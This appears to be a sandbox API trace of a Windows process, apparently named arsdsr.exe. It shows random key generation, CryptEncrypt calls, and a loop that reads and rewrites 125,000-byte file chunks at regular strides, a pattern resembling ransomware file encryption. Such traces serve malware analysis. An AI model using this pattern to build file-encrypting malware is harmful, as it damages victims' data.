lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.382] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0088.382] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.382] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.382] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0088.382] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.382] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.382] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e990*=0x100) returned 1 [0088.382] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.382] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.382] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e98c*=0x100) returned 1 [0088.382] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa160012, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.383] SetLastError (dwErrCode=0x0) [0088.383] WriteFile (in: hFile=0x220, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0088.389] GetLastError () returned 0x0 [0088.389] GetLastError () returned 0x0 [0088.389] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa160112, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.389] WriteFile (in: hFile=0x220, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0088.389] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa160212, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.389] WriteFile (in: hFile=0x220, lpBuffer=0x547de8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x547de8*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0088.389] GetProcessHeap () returned 0x500000 [0088.389] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.389] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.389] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.403] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.403] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.404] GetProcessHeap () returned 0x500000 [0088.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.404] GetProcessHeap () returned 0x500000 [0088.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.404] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d090, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.404] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.416] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d090, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.416] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.417] GetProcessHeap () returned 0x500000 [0088.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.417] GetProcessHeap () returned 0x500000 [0088.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.417] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.417] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.430] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.430] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.431] GetProcessHeap () returned 0x500000 [0088.431] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.431] GetProcessHeap () returned 0x500000 [0088.431] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.431] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xb71b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.431] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.441] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xb71b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.441] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.442] GetProcessHeap () returned 0x500000 [0088.442] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.442] GetProcessHeap () returned 0x500000 [0088.442] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.442] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf4240, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.442] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.461] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf4240, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.461] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.463] GetProcessHeap () returned 0x500000 [0088.463] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.463] GetProcessHeap () returned 0x500000 [0088.463] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.463] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1312d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.463] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.474] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1312d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.474] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.474] GetProcessHeap () returned 0x500000 [0088.475] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.475] GetProcessHeap () returned 0x500000 [0088.475] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.475] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16e360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.475] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.486] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16e360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.486] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.486] GetProcessHeap () returned 0x500000 [0088.486] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.486] GetProcessHeap () returned 0x500000 [0088.486] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.487] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ab3f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.487] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.498] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ab3f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.498] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.499] GetProcessHeap () returned 0x500000 [0088.499] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.499] GetProcessHeap () returned 0x500000 [0088.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.499] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e8480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.499] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.520] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e8480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.520] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.534] GetProcessHeap () returned 0x500000 [0088.534] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.534] GetProcessHeap () returned 0x500000 [0088.534] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.534] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x225510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.535] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.545] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x225510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.545] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.546] GetProcessHeap () returned 0x500000 [0088.546] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.546] GetProcessHeap () returned 0x500000 [0088.546] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.546] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2625a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.546] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.556] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2625a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.556] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.557] GetProcessHeap () returned 0x500000 [0088.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.557] GetProcessHeap () returned 0x500000 [0088.557] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.557] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29f630, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.557] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.568] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29f630, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.568] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.569] GetProcessHeap () returned 0x500000 [0088.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.569] GetProcessHeap () returned 0x500000 [0088.569] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.569] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2dc6c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.569] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.580] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2dc6c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.580] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.581] GetProcessHeap () returned 0x500000 [0088.581] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.581] GetProcessHeap () returned 0x500000 [0088.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.581] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x319750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.581] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.612] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x319750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.612] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.612] GetProcessHeap () returned 0x500000 [0088.613] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.613] GetProcessHeap () returned 0x500000 [0088.613] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.613] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3567e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.613] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.623] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3567e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.623] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.624] GetProcessHeap () returned 0x500000 [0088.624] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.624] GetProcessHeap () returned 0x500000 [0088.624] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.624] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x393870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.624] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.642] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x393870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.642] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.643] GetProcessHeap () returned 0x500000 [0088.643] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.643] GetProcessHeap () returned 0x500000 [0088.643] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.643] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d0900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.643] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.653] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d0900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.653] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.654] GetProcessHeap () returned 0x500000 [0088.654] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.654] GetProcessHeap () returned 0x500000 [0088.654] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.654] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x40d990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.654] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.672] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x40d990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.672] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.673] GetProcessHeap () returned 0x500000 [0088.673] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.673] GetProcessHeap () returned 0x500000 [0088.673] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.673] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44aa20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.673] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.764] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44aa20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.764] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.764] GetProcessHeap () returned 0x500000 [0088.764] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.764] GetProcessHeap () returned 0x500000 [0088.764] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.764] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x487ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.764] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.772] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x487ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.772] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.773] GetProcessHeap () returned 0x500000 [0088.773] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.773] GetProcessHeap () returned 0x500000 [0088.773] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.773] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c4b40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.773] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c4b40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 